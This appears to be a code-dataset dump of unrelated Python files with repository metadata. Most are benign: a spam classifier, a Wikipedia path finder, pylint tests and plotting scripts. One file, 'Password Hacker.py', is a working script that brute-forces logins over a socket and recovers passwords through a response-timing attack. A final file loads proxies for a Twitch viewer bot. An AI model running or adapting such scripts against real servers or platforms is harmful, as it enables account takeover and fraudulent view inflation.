command = input('\n 1. All Accounts.'
'\n 2. Open New Account.'
'\n 3. Account Update.'
'\n 4. <= Back.'
'\n Enter one of the options above:\t')
if command == '1':
all_accounts()
if command == '2':
new_account()
if command == '3':
account_update()
def admin_transfers():
command = input('\n 1. All Transfers.'
'\n 2. Money Transfer'
'\n 3. Transfer Update.'
'\n 4. <= Back.'
'\n Enter one of the options above:\t')
if command == '1':
all_transactions()
if command == '2':
transfer()
if command == '3':
transfer_update()
| true |
99e79eb6ecdf4c5570333b93c078e7307cdc56db | Python | nikhilchandrapoddar099/Spam_mail_Classifier | /main.py | UTF-8 | 2,099 | 2.703125 | 3 | [] | no_license |
#for mail Extraction online
import pandas as pd
import pickle
from flask import Flask, render_template, request
import re
import nltk
nltk.download("stopwords")
from nltk.corpus import stopwords
from nltk.stem.porter import PorterStemmer
app = Flask(__name__)
@app.route('/')
def student():
return render_template('home.html')
@app.route('/result',methods = ['POST', 'GET'])
def fun1():
if request.method == 'POST':
p1= request.form["p1"]
p2 = request.form["p2"]
test = request.form["p3"]
data = pd.read_csv("spam.csv")
final_result = []
for i in range(0, 5572):
review = re.sub('[^a-zA-Z]', ' ', data['EmailText'][i])
review = review.lower()
review = review.split()
ps = PorterStemmer()
review = [ps.stem(word) for word in review if not word in stopwords.words("english")]
review = " ".join(review)
final_result.append(review)
print(final_result)
from sklearn.feature_extraction.text import CountVectorizer
cv = CountVectorizer()
x = cv.fit_transform(final_result).toarray()
y = data.iloc[:, 0].values
y = y.reshape((5572, 1))
from sklearn.preprocessing import LabelEncoder
l = LabelEncoder()
y[:, 0] = l.fit_transform(y[:, 0])
y = y.astype('int')
review = re.sub('[^a-zA-Z]', ' ', test)
review = review.lower()
review = review.split()
review = [ps.stem(word) for word in review if not word in stopwords.words("english")]
review = " ".join(review)
print([review])
test = cv.transform([review]).toarray()
from sklearn.ensemble import BaggingClassifier
model = BaggingClassifier()
model.fit(x, y)
pred = model.predict(test)
a=pred[0]
if(a==0):
d="Not Spam"
elif(a==1):
d="Spam"
else:
d="null"
return render_template("result.html",result = d)
if __name__ == '__main__':
app.run(host="127.0.0.1",port=8080,debug=True) | true |
f33f191a4fc8de8928f9341414b4e97ae32a4ae4 | Python | kalimuthu123/CapAI | /tests/test_utils.py | UTF-8 | 1,467 | 2.921875 | 3 | [
"MIT"
] | permissive | import os
from ln2sql.parser import Parser
from ln2sql.stopwordFilter import StopwordFilter
BASE_PATH = os.path.dirname(os.path.dirname(__file__)) # Project directory.
STOPWORDS_PATH = os.path.join(BASE_PATH, 'ln2sql/stopwords/')
def test_parser_sort_length():
input_list = ['len2 len2', 'len1', 'len3 len3 len3']
expected = ['len3 len3 len3', 'len2 len2', 'len1']
assert Parser.transformation_sort(input_list) == expected
def test_parser_sort_length_lexical():
input_list = ['len2 len2', 'len1', 'len3 len3 len3', 'alen3 alen3 alen3']
expected = ['alen3 alen3 alen3', 'len3 len3 len3', 'len2 len2', 'len1']
assert Parser.transformation_sort(input_list) == expected
def test_english_stopword_filter():
stopwordFilter = StopwordFilter()
stopwordFilter.load(STOPWORDS_PATH + 'english.txt')
input_sentence = 'The cat drinks milk when the dog enter in the room and his master look the TV of the hostel'
expected = 'cat drinks milk dog enter room master tv hostel'
assert stopwordFilter.filter(input_sentence) == expected
def test_french_stopword_filter():
stopwordFilter = StopwordFilter()
stopwordFilter.load(STOPWORDS_PATH + 'french.txt')
input_sentence = "Le chat boit du lait au moment où le chien rentre dans la maison et que son maître regarde la TV de l'hôtel"
expected = 'chat boit lait chien rentre maison maitre regarde tv hotel'
assert stopwordFilter.filter(input_sentence) == expected | true |
cadff361cc26943685cdbdbc25212156f725e1bc | Python | sugacom/AllOfTestFiles | /triangle.py | UTF-8 | 207 | 3.75 | 4 | [] | no_license | class Triangle:
def __init__(self, b, h):
self.base = b
self.height = h
def cal_area(self):
return self.base * self.height / 2
tri1 = Triangle(3, 5)
print(tri1.cal_area())
| true |
d735781cab4d4b347421b30e1cf6cd8a0bc124aa | Python | arjunlohan/Password-Hacker | /Password Hacker.py | UTF-8 | 2,950 | 2.65625 | 3 | [] | no_license | # write your code here
import sys
import socket
import itertools
import json
from datetime import datetime
def letters(word):
if len(word) == 1:
return [word.lower(), word.upper()]
return [f"{j}{i}" for j in letters(word[0]) for i in letters(word[1:])]
a_z = [chr(x) for x in range(ord('a'), ord('z') + 1)]
A_Z = [chr(x).upper() for x in range(ord('a'), ord('z') + 1)]
zero_nine = [str(i) for i in range(0,10)]
#alphabet = 'abcdefghijklmnopqrstuvwxyz0123456789'
#letters = {"a-z": "abcdefghijklmnopqrstuvwxyz", "A-Z": "ABCDEFGHIJKLMNOPQRSTUVWXYZ", "0-9": "0123456789"}
#password = open('/Users/arjunlohan/Downloads/passwords.txt', 'r')
login = open("/Users/arjunlohan/Downloads/logins.txt", 'r')
args_list = sys.argv
IP = str(args_list[1])
port = int(args_list[2])
break_while_loop = ""
with socket.socket() as hack_socket:
address = (IP,port)
hack_socket.connect(address)
response = 0
lenght = 1
password_list = a_z + zero_nine + A_Z + a_z
password_empty = " "
response_time = []
for i in login:
message = {"login": i.strip(), "password": password_empty}
message = json.dumps(message)
#print(message)
hack_socket.send(message.encode())
response = hack_socket.recv(1024)
#response = response.decode()
response_json = json.loads(response)
#print(response_json)
if str(response_json) == "{'result': 'Wrong password!'}":
z = 0
password = ""
while break_while_loop != "Connection success!":
#print(z)
password_input = password + password_list[z]
#print(password_input)
message = {"login": i.strip(), "password": password_input}
#print(password_list[z])
message = json.dumps(message, indent=1)
start = datetime.now()
hack_socket.send(message.encode())
response = hack_socket.recv(1024)
finish = datetime.now()
difference = finish - start
response_time.append(difference)
# response = response.decode()
response_json = json.loads(response)
#print(response_json)
result = str(response_json)
#print(result)
#print(difference)
if result == "{'result': 'Wrong password!'}":
if int(str(difference)[-6::]) > 6000:
password += password_list[z]
z = 0
else:
z += 1
elif result == "{'result': 'Connection success!'}":
print(message)
#print(password_input)
break_while_loop = "Connection success!"
else:
pass
if break_while_loop == "Connection success!":
break
| true |
3d81ff8f1c734699d8d97fdc2e9b8977b1b094aa | Python | daliagachc/sara-cluster | /sara_cluster/util.py | UTF-8 | 1,064 | 2.609375 | 3 | [] | no_license | # project name: sara-cluster
# created by diego aliaga daliaga_at_chacaltaya.edu.bo
from useful_scit.imps import *
def hist_better(ds,col,**dp_qwargs):
# col = NCONC01
ds1 = ds[[col]].to_dataframe()
ds2 = ds1.dropna()
q1,q2 = ds2.quantile([.02,.98]).values
lg = np.logspace(np.log10(q1),np.log10(q2),20)
ax = sns.distplot(
ds2[q1<ds2][q2>ds2].dropna(),bins=lg.flatten(),kde=False,
**dp_qwargs
)
ax.set_xscale('log')
ax.set_title(col)
def hist_better_mult(ds,cols):
lc = len(cols)
f, axs = plt.subplots(1, lc, figsize=(5 * lc, 3), sharey=True)
axs = axs.flatten()
for c in range(lc):
hist_better(ds, cols[c], ax=axs[c])
class MadeUp:
def __init__(self,col:str,df:pd.DataFrame):
# self.custom_winsorize(col, df)
pass
def custom_winsorize(df:pd.DataFrame, col:str, quan=0.05):
df1 = df
# col = NCONC01
_df = df[col]
# quan = .05
q1, q2 = _df.quantile([quan, 1 - quan])
b1 = (_df > q1)
b2 = (_df < q2)
b3 = b1 & b2
df1[col] = _df.where(b3)
return df1 | true |
cdfb642c12c3a4777f79368bc0ffaa2b0328b853 | Python | mhfarahani/WikiRacer | /src/WikiRacer.py | UTF-8 | 5,322 | 3.234375 | 3 | [] | no_license | import sys
import wikipedia
import json
from collections import deque
#from flask import Flask
import networkx as nx
#import matplotlib.pyplot as plt
import time
from bs4 import BeautifulSoup
from urllib.request import urlopen
import re
def GetTitles(title,verbose=True):
"""
Given a title of a Wikipedia page, this function returns
the titles of the Wikipedia links in the page.
Note: The Wikipedia module uses the BeautifulSoup module and
it does not always use the best HTML parser in python 3.
"""
if verbose:
try:
print(title)
except:
print("Warning: 'gbk' can not encode unicode characters")
try:
page = wikipedia.page(title)
return page.links
except:
return []
def GetTitleOfLink(url):
"""
Given a Wikipedia URL, this function returns the title of
the page.
"""
wiki_html = urlopen(url).read()
parsed_html = BeautifulSoup(wiki_html,'html.parser')
title_html = parsed_html.find('h1',attrs={'id':'firstHeading'})
title = re.search('>([\w\s\d]+)</',str(title_html))
print(title.group(1))
return title.group(1)
def GetUrls(titles):
"""
This function returns the URLs of the titles in the input list.
titles: A list of Wikipedia page titles.
"""
links = []
for title in titles:
page = wikipedia.page(title)
links.append(page.url)
return links
def GetInputs(file_path):
"""
This functions get the path to the input folder and read the
JSON file in the folder. It returns the start and end title
that is used in the wiki race.
file_path: The file path of the output file.
"""
ajson = open(file_path,'r')
input_json = json.load(ajson)
start_url = input_json['start']
end_url = input_json['end']
start_title = GetTitleOfLink(start_url)
end_title = GetTitleOfLink(end_url)
ajson.close()
return start_title,end_title
def TimeElapsed(starting_time):
"""
This function returns the elapsed time of the search.
starting_time: The clock time when the Wikiracer start searching
"""
current_time = time.clock()
return current_time - starting_time
def ConvertToJson(start_title,target_title,alist,file_path):
"""
This function writes the outputs in the specified folder in
JSON format.
start_title: The title of the starting page
target title: The title of the end page
alist: A list of the titles of the shortest path
file_path: A path to the output file
"""
output_file = open(file_path,'w')
start_url = GetUrls([start_title])
end_url = GetUrls([target_title])
path_urls = GetUrls(alist)
url_dict = {"start": start_url,
"end": end_url,
"path": path_urls}
json.dump(url_dict,output_file)
output_file.close()
def FindShortestPath(start,target,max_time = 3600):
"""
This function uses a graph to represent link-connectivity
between the start and end pages. The shortest path is
found using the Dijkstra's algorithm.
start: Title of the starting page (A graph node)
target: Title of the end page (A graph node)
max_time: The time limit in seconds that the Wikiracer is
allowed to search for the path.
"""
start_time = time.clock()
print('WikiRacer is searching for the shortest path between %s \
and %s. Please be patient!' %(start,target))
graph = nx.Graph()
queue = deque()
queue.append(start)
found = False
timeout = False
while not found and not timeout:
for item in list(queue):
titles = GetTitles(item)
'''check whether target is in the titles'''
if target in titles:
graph.add_edge(item,target)
print('Processing time: %i sec' % TimeElapsed(start_time))
return nx.dijkstra_path(graph,start,target),graph
found = True
break
for title in titles:
queue.append(title)
graph.add_edge(item,title)
queue.popleft()
current_time = time.clock()
processing_time = TimeElapsed(start_time)
if processing_time >= max_time:
timeout = True
def main():
"""
This function reads the folder pathes for input and output
files and pass it to FindShortestPath function to find the
path between start and end pages.
"""
args = sys.argv[1:]
if not args:
print ("Error: Please add the '[input_file output_file]' to \
your execution command.")
sys.exit(1)
input_path = args[0]
output_path = args[1]
starting_title,ending_title = GetInputs(input_path)
min_path,graph = FindShortestPath(starting_title,ending_title)
ConvertToJson(starting_title,ending_title,min_path,output_path)
try:
print('Path found:')
print(min_path)
except:
print('Path not found')
if __name__ == '__main__':
main()
| true |
f111c4b56bfd7a144d625f0102520e71a9129a8f | Python | rjgcabrera/CS21A | /Empty.py | UTF-8 | 394 | 2.59375 | 3 | [] | no_license | # -----------------------------------------------------------------------------
# Name: empty
# Purpose: empty exception for stack ADT
#
# Author: Raymond Cabrera
#
# Created: 10/04/2013
# -----------------------------------------------------------------------------
class Empty(Exception):
"""
Error attempting to access an element from an empty container.
"""
pass | true |
31b18a29bfcf356dde3176575570e43a5aa8f83b | Python | cpatrizio88/A405 | /python/nchaparrday4/Day4.py | UTF-8 | 1,637 | 3.3125 | 3 | [] | no_license | import numpy as np
import matplotlib.pyplot as plt
import scipy.io
def probfv(C,a,v, T):
f_v = (C*v**2)*np.exp(1.0*(-a*v**2)/(2))
return f_v
def calc_testmean(v, fv):
testmean = 0
for i in range(len(v)):
testmean = testmean + v[i]*fv[i]
return testmean
#Constants and Factors
k_B = 1.38065*10**(-23) # m^2 kg s^-2 K^-1, Boltzman Constant
Na = 6.0221415*10**(23) #avogadro's number
m =(1.0*28/Na)*10**(-3) #kg, mass of Nitrogen molecule (N2)
T = np.array([270,370]) #K, the two given temperatures
a = 1.0*m/(k_B*T) #factor
C = np.sqrt((1.0*2/np.pi)*(a)**3) #factor
#Calculations
v = np.arange(0, 2500, 1) #molecular velocity array
fv0 = probfv(C[0], a[0], v, T[0]) #probability distribution function of velocity at 270K
fv1 = probfv(C[1], a[1], v, T[1]) #probability distribution function of velocity at 370K
mean = np.array([np.dot(fv0, v), np.dot(fv1, v)]) #mean velocties at 270K and 370K, calculated by dot product of velocity and pdf matrices
testmean = np.array([calc_testmean(v, fv0), calc_testmean(v, fv1)])# as above except by elemental multiplication and summing
anmean = np.array([2*C[0]/a[0]**2, 2*C[1]/a[1]**2]) #analyitic mean from integration by parts of vf(v)
#Printouts
print 'mean velocities', mean
print 'test on mean velocities', testmean
print 'analytic mean velocities', anmean
#plots
fig = plt.figure(1)
ax1=fig.add_subplot(111)
ax1.set_title('Molecular Velocity vs its Probability Function')
ax1.set_xlabel('v (m/s)')
ax1.set_ylabel('f(v)')
ax1.plot(v, fv0, 'b', label='at 270K')
ax1.plot(v, fv1, 'r', label='at 370K')
ax1.legend(loc='upper right')
plt.show()
| true |
30aaa28cf42bbc43060988ce8c7ea24cf72c1bb5 | Python | anhnn2010/scrapy | /caring/caring/spiders/caring_1.py | UTF-8 | 4,769 | 2.734375 | 3 | [] | no_license | # -*- coding: utf-8 -*-
import scrapy
from ..items import CityItem, CountryItem, CompanyItem
class Caring1Spider(scrapy.Spider):
name = 'caring_1'
# allowed_domains = ['caring.com']
start_urls = ['https://www.caring.com/']
def parse(self, response):
list_state_hrefs = response.xpath("//*[@id='top-states']//a/@href").getall()
list_state_keys = [i.split('/')[-1] for i in list_state_hrefs]
base_url = 'https://www.caring.com/senior-care'
list_url_cares = [f'{base_url}/{state}' for state in list_state_keys]
for url in list_url_cares:
yield scrapy.Request(url=url, callback=self.parse_summary)
def parse_summary(self, response):
list_cities = response.xpath("//*[@id='cities']//div[@class='lrtr-list-item']")
state = response.xpath("//ol[@class='breadcrumb']//a/text()")[-1].get()
# ### inspect response by scrapy shell
# from scrapy.shell import inspect_response
# inspect_response(response, self)
# ###
# city = list_cities[0]
for city in list_cities:
city_name = city.xpath(".//a/text()").get()
city_sum = city.xpath("./div[@class='text-subtitle2']/text()").get().strip()
# print(f'{city_name}: {city_sum}')
city_item = CityItem()
city_item['state'] = state
city_item['city'] = city_name
city_item['total'] = city_sum
yield city_item
### start country ###
list_countries = response.xpath("//*[@id='counties']//div[@class='lrtr-list-item']")
# country = list_countries[0]
for country in list_countries:
country_name = country.xpath(".//a/text()").get()
country_sum = country.xpath("./div[@class='text-subtitle2']/text()").get().strip()
# print(f'{country_name}: {country_sum}')
country_item = CountryItem()
country_item['state'] = state
country_item['country'] = country_name
country_item['total'] = country_sum
yield country_item
country_url = country.xpath(".//a/@href").get()
yield scrapy.Request(url=country_url, callback=self.parse_country)
### end country ###
def parse_country(self, response):
country = response.xpath("//ol[@class='breadcrumb']//a/text()")[-1].get()
state = response.xpath("//ol[@class='breadcrumb']//a/text()")[-2].get()
### start company ###
list_companies = response.xpath("//div[@class='search-result']")
# company = list_companies[0]
for company in list_companies:
company_name = company.xpath(".//div[@class='details']/h3//a/text()").get()
if company.xpath(".//span[@class='count']/a/text()"):
review_num = company.xpath(".//span[@class='count']/a/text()").re(r'(\d+) review')[0]
else:
self.log(f'There is no reviewer for this company: {response.url}')
review_num = None
if company.xpath(".//input/@value"):
review_star = round(float(company.xpath(".//input/@value").get()), 1)
else:
self.log(f'There is no star for this company: {response.url}')
review_star = None
review_text = company.xpath(".//div[@class='hidden-xs']/div[@class='description']/text()").get().strip().strip('"')
company_info = {
'state': state,
'country': country,
'name': company_name,
'review_num': review_num,
'review_star': review_star,
'review_text': review_text
}
link = company.xpath(".//a[contains(@class, 'btn-secondary')]/@href").get()
url = link + '#description'
req = scrapy.Request(url=url, callback=self.parse_desc, cb_kwargs=company_info, dont_filter=True)
yield req
### end company ###
def parse_desc(self, response, **kwargs):
# print(reponse.url)
company = kwargs
text = response.xpath("//*[@id='description']/div//p/text()").getall()
description = '\n'.join(text).strip()
company['description'] = description
company_item = CompanyItem()
company_item['state'] = company['state']
company_item['country'] = company['country']
company_item['name'] = company['name']
company_item['service'] = 'Home Care'
company_item['total_review'] = company['review_num']
company_item['star'] = company['review_star']
company_item['review_text'] = company['review_text']
company_item['description'] = company['description']
yield company_item
| true |
1a2149840f48aa23b84f5d3d0ff4530585b1c403 | Python | cloew/WiiCanDoIt-Framework | /src/GameEventParser/GameEventLogger.py | UTF-8 | 384 | 2.515625 | 3 | [] | no_license | import time
import os
import pickle
class GameEventLogger:
# Filehandle
logfile = None
def __init__(self):
path = os.path.dirname(os.path.abspath(__file__)) + "/gameEventLog/" + str(time.time()) + ".txt"
self.logfile = open(path, "wb")
def log(self, funcParams):
pickle.dump(funcParams, self.logfile, pickle.HIGHEST_PROTOCOL)
def close(self):
self.logfile.close()
| true |
4c9da353eea5fba461175962f51a2915b8b9e546 | Python | vkvasu25/leetcode | /amazon/count_pairs_in_sorted_array.py | UTF-8 | 1,022 | 4.28125 | 4 | [] | no_license | """
https://www.youtube.com/watch?v=bptRLm3OiV8
given an array of numbers in sorted order
count the pairs of numbers whose sum is less than X
for example: [2,4,6,8,9], the x=14
"""
class Solution:
# this one is simple but slow with complexity O(n2)
def count_pairs(self, array, x):
count = 0
for i in range(len(array)):
for j in range(i+1, len(array)):
if array[i] + array[j] < x:
# print('{} + {} < {}'.format(array[i],array[j],x))
count +=1
return count
# create the function with memory complexity O(n):
def count_pairs_smart(self, array, x):
first = 0
last = len(array)-1
count = 0
while first <=last:
if array[first]+ array[last]< x:
count += last - first
first +=1
else:
last -=1
return count
sol = Solution()
print(sol.count_pairs([2,4,6,8,9],14))
print(sol.count_pairs_smart([2,4,6,8,9], 14)) | true |
8a4aec9df71de538ce74a8329c3f1484d2ea42f6 | Python | chenchals/interview_prep | /amazon/binary_tree_level_order_traversal.py | UTF-8 | 1,107 | 3.578125 | 4 | [] | no_license | # Definition for a binary tree node.
class TreeNode(object):
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution(object):
def levelOrder(self, root):
"""
:type root: TreeNode
:rtype: List[List[int]]
"""
if not root:
return []
ret = []
# this stack keep tracks nodes in current level
parent_stack = []
# this stack tracks nodes in child level
child_stack = []
parent_stack.append(root)
while len(parent_stack) != 0:
cur_level = []
for each in parent_stack:
cur_level.append(each.val)
if each.left:
child_stack.append(each.left)
if each.right:
child_stack.append(each.right)
# for each level, replace parent level stack with child level stack
parent_stack = child_stack
# and clean child level stack
child_stack = list()
ret.append(cur_level)
return ret
| true |
12ae3e230711c635a750592e4057e98059571076 | Python | jbloomfeld/cs591finalproject | /data/DataPrep.py | UTF-8 | 4,726 | 3.265625 | 3 | [] | no_license | import numpy as np
import networkx as nx
import collections as c
import matplotlib.pyplot as plt
### Load Datasets
# Read the Les Miserables co-occurrence graph.
graphLM = nx.read_gml('lesmis.gml')
matrixLM = nx.to_scipy_sparse_matrix(graphLM)
# Layout a graph using the spring force algorithm.
nx.draw_spring(graphLM)
# Print the matrix.
plt.spy(matrixLM, precision=1e-3, marker='.', markersize=5)
### Fundamental Network Statistics
## Degree
degreeLM = matrixLM.sum(0)
# Plotting
# Degree Distribution
np.squeeze(np.asarray(degreeLM))
plt.hist(np.squeeze(np.asarray(degreeLM)))
plt.title("Degree Distribution")
plt.xlabel("Degree")
plt.ylabel("Frequency")
# Degree Rank
plt.loglog(sorted(np.squeeze(np.asarray(degreeLM)), reverse=True), 'b-', marker='o')
plt.title("Degree Rank")
plt.ylabel("Degree")
plt.xlabel("Rank")
plt.axes([0.45,0.45,0.45,0.45])
Gcc=max(nx.connected_component_subgraphs(graphLM), key=len)
pos=nx.spring_layout(Gcc)
plt.axis('off')
nx.draw_networkx_nodes(Gcc, pos, node_size=20)
nx.draw_networkx_edges(Gcc, pos, alpha=0.4)
# log Binning
# Based on: http://stackoverflow.com/questions/16489655/plotting-log-binned-network-degree-distributions
def drop_zeros(a_list):
return [i for i in a_list if i>0]
degreeLM_dict = dict(c.Counter(np.squeeze(np.asarray(degreeLM))))
max_x = np.log10(max(degreeLM_dict.keys()))
max_y = np.log10(max(degreeLM_dict.values()))
max_base = max([max_x,max_y])
min_x = np.log10(min(drop_zeros(degreeLM_dict.keys())))
bins = np.logspace(min_x, max_base, num=10)
bin_means_y = (np.histogram(degreeLM_dict.keys(), bins, weights=degreeLM_dict.values())[0] / np.histogram(degreeLM_dict.keys(),bins)[0])
bin_means_x = (np.histogram(degreeLM_dict.keys(), bins, weights=degreeLM_dict.keys())[0] / np.histogram(degreeLM_dict.keys(),bins)[0])
plt.xscale('log')
plt.yscale('log')
plt.scatter(bin_means_x, bin_means_y, c='r', marker='s', s=50)
plt.xlim((0.75,70))
plt.ylim((.9,75))
plt.xlabel('Connections (normalized)')
plt.ylabel('Frequency')
# Cumulative Degree Distribution
# The cumulative degree distribution can simply be computed by:
# sorting the degrees of each vertex in descending order
# compute the corresponding ranks 1...n
# plot the rank divided by the number of vertices as a function or the degree
cumDegreeLM = np.array([np.sort(np.squeeze(np.asarray(degreeLM)))[::-1]])
cumDegreeLM = np.concatenate((cumDegreeLM, np.array([range(1, degreeLM.shape[1]+1)], dtype=np.float)), 0)
cumDegreeLM = np.concatenate((cumDegreeLM, np.array([cumDegreeLM[1]/degreeLM.shape[1]])), 0)
plt.loglog(cumDegreeLM[0,:], cumDegreeLM[2,:])
plt.title("Cumulative Degree Distribution")
plt.xlabel("Degree (k)")
plt.ylabel("$P(x \geq k)$")
## Get Minimum/Maximum Degrees
print([np.min(degreeLM), np.max(degreeLM)])
## Get Number of Edges
edgesLM = matrixLM.sum()/2
print(edgesLM)
## Get Mean Degree
cLM = 2 * edgesLM/matrixLM.shape[0]
print(cLM)
## Get Density
rhoLM = cLM/(matrixLM.shape[0]-1.0)
print(rhoLM)
### Network Centrality
graphLM = nx.read_gml('data/lesmis.gml')
## Eigenvalue spectrum
spectrum = np.sort(nx.laplacian_spectrum(graphLM))
plt.plot(spectrum)
## Degree Centrality
degreeCentrality = nx.degree_centrality(graphLM)
layout=nx.spring_layout(graphLM,k=.2,iterations=1000, scale=5)
values = [degreeCentrality.get(node)/max(degreeCentrality.values()) for node in graphLM.nodes()]
nx.draw(graphLM, pos=layout, cmap = plt.get_cmap('jet'), node_color=values, with_labels=False)
plt.savefig('data/lesMiserables-degree-centrality.svg')
plt.savefig('data/lesMiserables-degree-centrality.pdf')
## Closeness
closenessCentrality = nx.closeness_centrality(graphLM)
values = [closenessCentrality.get(node)/max(closenessCentrality.values()) for node in graphLM.nodes()]
nx.draw(graphLM, pos=layout, cmap = plt.get_cmap('jet'), node_color=values, with_labels=False)
plt.savefig('data/lesMiserables-closeness-centrality.svg')
plt.savefig('data/lesMiserables-closeness-centrality.pdf')
## Betweenness
betweennessCentrality = nx.betweenness_centrality(graphLM)
values = [betweennessCentrality.get(node)/max(betweennessCentrality.values()) for node in graphLM.nodes()]
nx.draw(graphLM, pos=layout, cmap = plt.get_cmap('jet'), node_color=values, with_labels=False)
plt.savefig('data/lesMiserables-betweenness-centrality.svg')
plt.savefig('data/lesMiserables-betweenness-centrality.pdf')
## Eigenvector
eigenCentrality = nx.eigenvector_centrality(graphLM)
values = [eigenCentrality.get(node)/max(eigenCentrality.values()) for node in graphLM.nodes()]
nx.draw(graphLM, pos=layout, cmap = plt.get_cmap('jet'), node_color=values, with_labels=False)
plt.savefig('data/lesMiserables-eigen-centrality.svg')
plt.savefig('data/lesMiserables-eigen-centrality.pdf')
| true |
78765f2f64b6cb111c73e1143b3dd992c2908beb | Python | charles-lau520/python_study | /00_python_test/string.py | UTF-8 | 563 | 3.390625 | 3 | [] | no_license | #开发人员 :
#_+_coding: UTF-8_*_
#开发团队 : LC_Group
#开发人员 :
#开发时间 : 2020/8/24 16:21
#文件名称 : string.py
#开发工具 : PyCharm
a = "I LOVE PYTHON"
list = a.split()
print(list)
new_a = "-".join(list)
print(new_a)
b = "I LIKE {0} AND {1}".format("APPLE","ORANGE")
print(b)
# 占位符长度
# {0:10} 10个占位符
# {1:>15} 15个占位符并右对齐
b = "I LIKE {0:10} AND {1:^10} AND {2:>15}".format("APPLE","BANANA","ORANGE")
print(b)
c = "she is {0:4d} year old and {1:.1f}m hight".format(20,1.68)
print(c)
| true |
6814b32d50b3d5e83a7804600a9071a8c5af739f | Python | regisb/edx-lint | /test/plugins/pylint_test.py | UTF-8 | 4,313 | 2.90625 | 3 | [
"LicenseRef-scancode-warranty-disclaimer",
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | """Infrastructure for testing pylint plugins."""
import re
import textwrap
import warnings
from pylint.__pkginfo__ import numversion as pylint_numversion
from pylint.lint import Run
from pylint.reporters import CollectingReporter
def find_line_markers(source):
"""Find line markers in program source.
Returns a dict mapping line numbers to the marker on that line.
"""
markers = {}
for lineno, line in enumerate(source.splitlines(), start=1):
m = re.search(r"#=(\w+)", line)
if m:
markers[lineno] = m.group(1)
return markers
def test_find_line_markers():
markers = find_line_markers(
"""\
line 1 #=A
line 2
line 3 #=Hello
"""
)
assert markers == {1: "A", 3: "Hello"}
class SimpleReporter(CollectingReporter):
"""A pylint message reporter that collects the messages in a list."""
# Pylint does not specify well what a reporter must do. This works.
def _display(self, layout):
pass
def run_pylint(source, msg_ids):
"""Run pylint on some source, collecting specific messages.
`source` is the literal text of the program to check. It is
dedented and written to a temp file for pylint to read.
`msg_ids` is a comma-separated string of msgids we are interested
in. Use "all" to enable all messages.
Returns a set of messages. Each message is a string, formatted
as "line:msg-id:message". "line" will be the line number of the
message, or if the source line has a comment like "#=Slug", then
it will be "Slug" instead. This makes it easier to write, read,
and maintain the tests.
"""
with open("source.py", "w") as f:
f.write(textwrap.dedent(source))
reporter = SimpleReporter()
pylint_args = ["source.py", "--disable=all", "--enable={}".format(msg_ids)]
if pylint_numversion >= (2, 0):
kwargs = dict(do_exit=False)
else:
kwargs = dict(exit=False)
Run(pylint_args, reporter=reporter, **kwargs)
markers = find_line_markers(source)
messages = {"{line}:{m.symbol}:{m.msg}".format(m=m, line=markers.get(m.line, m.line)) for m in reporter.messages}
return messages
def test_that_we_can_test_pylint():
# This tests that our pylint-testing function works properly.
source = """\
# There's no docstring, but we don't ask for that msgid,
# so we won't get the warning.
# Unused imports. We'll get warned about the first one,
# but the second is disabled.
import colorsys #=A
import collections # pylint: disable=unused-import
# Three warnings on the same line, two different messages.
# redefined-builtin is checked by an IAstroidChecker.
# anomalous-backslash-in-string is checked by an ITokenChecker.
int = float = "\\a\\b\\c" #=B
# TODO is checked by an IRawChecker. #=C
"""
msg_ids = "unused-import,redefined-builtin,anomalous-backslash-in-string,fixme"
with warnings.catch_warnings():
# We want pylint to find the bad \c escape, but we don't want Python to warn about it.
warnings.filterwarnings(action="ignore", category=DeprecationWarning, message="invalid escape")
messages = run_pylint(source, msg_ids)
expected = {
"A:unused-import:Unused import colorsys",
"B:redefined-builtin:Redefining built-in 'int'",
"B:redefined-builtin:Redefining built-in 'float'",
"B:anomalous-backslash-in-string:Anomalous backslash in string: '\\c'. "
"String constant might be missing an r prefix.",
"C:fixme:TODO is checked by an IRawChecker. #=C",
}
assert expected == messages
def test_invalid_python():
source = """\
This isn't even Python, what will pylint do?
"""
messages = run_pylint(source, "all")
assert len(messages) == 1
message = messages.pop()
# Pylint 1.x says the source is <string>, Pylint 2.x says <unknown>
message = message.replace("<string>", "XXX").replace("<unknown>", "XXX")
assert message == "1:syntax-error:invalid syntax (XXX, line 1)"
# I would have tested that the msgids must be valid, but pylint doesn't seem
# to mind being told to enable non-existent msgids.
| true |
477e8a2c82af26f45cf57eff3d43475371d0bfc0 | Python | ethanhinch/AdventofCode2020 | /Day 2/PWPhilosophy.py | UTF-8 | 991 | 3.8125 | 4 | [] | no_license | #Take inputs from file and store them
def getInputs():
inputs = []
f = open("day2.txt", "r")
for x in f: inputs.append(x)
return inputs
#Convert the input strings into usable form:
# Integer lower and upper bounds, the restricted letter and the password
def parse(string):
sections = string.split(': ')
rule = sections[0].split(' ')
bounds = rule[0].split('-')
bounds[0] = int(bounds[0])
bounds[1] = int(bounds[1])
return [bounds[0], bounds[1], rule[1], sections[1]]
#Count the frequency of the letter in the string
def countFrequency(letter, string):
count = 0
for i in string:
if(i == letter):
count += 1
return count
#Initialise
inputs = getInputs()
correct = 0
#Process each input and determine if rule is broken or not
for i in range(0, len(inputs)):
parts = parse(inputs[i])
count = countFrequency(parts[2], parts[3])
if(count >= parts[0] and count <= parts[1]):
correct += 1
print(correct) | true |
98784a5979116472595c5d32c9e5a6e836983028 | Python | breuerfelix/twitch-viewer-bot | /proxies/hideme.py | UTF-8 | 1,986 | 2.71875 | 3 | [
"MIT"
] | permissive | import csv
import time
import sys
if __name__ == "__main__":
from utils import test_proxy, validate_ip
else:
from .utils import test_proxy, validate_ip
# export list from https://hidemy.name/en/proxy-list as csv
FILENAME = "hideme_proxy_export.csv"
def start_hideme_thread(callback):
get_new = _init_proxies(FILENAME)
while True:
try:
proxy = get_new()
if proxy == None:
raise "no proxy found"
except Exception as e:
print("hideme error", e)
sys.exit(0)
if test_proxy(proxy):
callback(proxy)
def _init_proxies(filename):
proxies = []
with open(filename, "r") as csv_file:
csv_reader = csv.DictReader(csv_file, delimiter=";")
for line, row in enumerate(csv_reader):
if line == 0:
continue
proxies.append(row)
print(f"loaded {len(proxies)} hideme proxies")
counter = 0
def get_new():
nonlocal counter
if counter >= len(proxies):
return None
row = proxies[counter]
scheme = None
if row["http"] == "1":
scheme = "http"
if row["ssl"] == "1":
scheme = "https"
if row["socks4"] == "1":
scheme = "socks4"
if row["socks5"] == "1":
scheme = "socks5"
proxy = f"{scheme}://{row['ip']}:{row['port']}"
counter += 1
return proxy
return get_new
if __name__ == "__main__":
# extract working proxies for test here
